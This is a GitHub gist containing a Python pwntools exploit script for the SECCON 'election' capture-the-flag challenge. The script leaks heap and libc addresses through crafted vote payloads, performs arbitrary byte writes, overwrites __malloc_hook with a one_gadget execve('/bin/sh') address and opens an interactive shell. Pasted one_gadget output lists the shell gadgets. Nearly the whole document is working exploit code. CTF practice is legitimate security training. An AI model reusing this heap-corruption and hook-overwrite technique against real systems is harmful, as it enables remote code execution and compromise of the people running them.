Skip to content

Instantly share code, notes, and snippets.

@moratorium08
Last active December 25, 2017 14:16
Show Gist options
  • Select an option

  • Save moratorium08/e96fd9e8b1cab79b417d07b274c9200f to your computer and use it in GitHub Desktop.

Select an option

Save moratorium08/e96fd9e8b1cab79b417d07b274c9200f to your computer and use it in GitHub Desktop.
# coding: utf-8
from __future__ import print_function, division
from pwn import *
is_gaibu = True
if is_gaibu:
host = "election.pwn.seccon.jp"
port = 28349
else:
host = "127.0.0.1"
port = 3000
lv = 0x602010
r = remote(host, port)
def menu(select, verbose=False):
s = r.recvuntil('>> ')
r.sendline(str(select))
if verbose:
print(s)
def stand(name, verbose=False):
menu(1, verbose)
s = r.recvuntil('>> ')
if verbose:
print(s)
r.sendline(str(name))
def vote(name, payload='yes', verbose=False, flag=True, show=True):
menu(2, verbose)
s = r.recvuntil('(Y/n) ')
if show:
r.sendline('Y')
s = r.recvuntil('>> ')
else:
r.sendline('n')
s = r.recvuntil('>> ')
r.sendline(name)
if verbose:
print(s)
if name == 'oshima':
s = r.recvuntil('>> ')
if verbose:
print(s)
r.sendline(payload)
s = r.recvuntil("done.\n")
if verbose:
print(s)
def result(verbose=False):
menu(3, verbose)
print(r.recvuntil('done.'))
def eat():
menu(4, verbose)
def make(addr, frm, to, size=4, wei=0):
addr -= 0x10
f = []
t = []
real = f[:]
for i in range(size):
f.append(frm % 256)
frm //= 256
for i in range(size):
t.append(to % 256)
to //= 256
# print([chr(x) for x in f], [chr(x) for x in t])
if frm > 0 or to > 0:
raise Exception("hoge")
for i in range(size):
if t[i] > f[i]:
diff = t[i] - f[i]
char = min(127, diff)
diff -= char
payload = 'yes\x00' + 'A' * 28 + p64(addr) + chr(char)
vote('oshima', payload, False, True, show=False)
if diff != 0:
if diff == 128:
payload = 'yes\x00' + 'A' * 28 + p64(addr) + chr(1)
vote('oshima', payload, False, True, show=False)
diff -= 1
payload = 'yes\x00' + 'A' * 28 + p64(addr) + chr(diff)
vote('oshima', payload, False, True, show=False)
elif t[i] < f[i]:
diff = f[i] - t[i]
char = min(128, diff)
diff -= char
payload = 'yes\x00' + 'A' * 28 + p64(addr) + chr(256 - char)
vote('oshima', payload, False, True, show=False)
if diff != 0:
payload = 'yes\x00' + 'A' * 28 + p64(addr) + chr(256 - diff)
vote('oshima', payload, False, True, show=False)
addr +=1
def get_heap_addr():
menu(2, False)
s = r.recvuntil('(Y/n) ')
r.sendline('Y')
s = r.recvuntil('>> ')
r.sendline('hogehoge')
addr = s.split('*')[4][1:].split("\n")[0]
addr += (4 - len(addr)) * '\x00'
return u32(addr) - 0x70
def get_addr():
menu(2, False)
s = r.recvuntil('(Y/n) ')
r.sendline('Y')
s = r.recvuntil('>> ')
r.sendline('hogehoge')
addr = s.split("\n")[4][2:]
addr += '\x00' * (8 - len(addr))
return u64(addr)
#print("start?")
#raw_input()
stand("hogehoge")
# get heap base
for i in range(32):
vote("oshima", "yes\x00" + "A" * 27)
heap_base = get_heap_addr()
print('heap base: ', hex(heap_base))
put_char_got = 0x601f80
put_char_libc = 0x71290
# libc leak
make(heap_base + 0x200, 0, put_char_got, wei=1)
make(heap_base + 0x58, heap_base + 0x10, heap_base + 0x200)
put_char_addr = get_addr()
# overwrite malloc hook
"""
ubuntu@ubuntu-xenial:~/vmshare$ one_gadget libc-2.23.so
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL
0xf0274 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL
0xf1117 execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
ubuntu@ubuntu-xenial:~/vmshare$ nm -D libc-2.23.so | grep __malloc_hook
00000000003c4b10 V __malloc_hook
"""
libc_base = put_char_addr - put_char_libc
rce_addr = libc_base + 0xf0274
malloc_hook = libc_base + 0x3c4b10
print("putchar_addr", hex(put_char_addr))
print("libc_base:", hex(libc_base))
print("rce_addr", hex(rce_addr))
print("malloc_hook:", hex(malloc_hook))
# overwrite stdinaddr + 216
make(malloc_hook, 0, rce_addr, size=8)
make(lv, 2, 1, size=4)
stand("fugafuga")
r.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment